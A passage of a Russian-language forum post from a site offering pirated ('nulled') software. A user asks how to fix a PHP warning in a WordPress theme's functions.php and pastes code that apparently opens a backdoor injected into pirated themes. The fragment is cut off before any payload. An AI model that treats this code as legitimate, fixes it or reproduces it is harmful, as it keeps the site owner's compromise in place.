• DONATE to NULLED!
    Вы можете помочь Форуму и команде, поддержать финансово.
    starwanderer - модератор этого раздела будет Вам благодарен!

Помощь Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' (this will throw an Error in a future

Sebades

Постоялец
Регистрация
14 Май 2019
Сообщения
63
Реакции
12
Use of undefined constant REQUEST_URI - assumed 'REQUEST_URI' (this will throw an Error in a future version of PHP) in /home/u135727435/domains/site.com/public_html/wp-content/themes//functions.php on line 74
Прошу помощи.
код :
Код:
if(!function_exists('theme_temp_setup')) {
    $path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
    if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
       
        function file_get_contents_tcurl($url)
        {
 
Назад
Сверху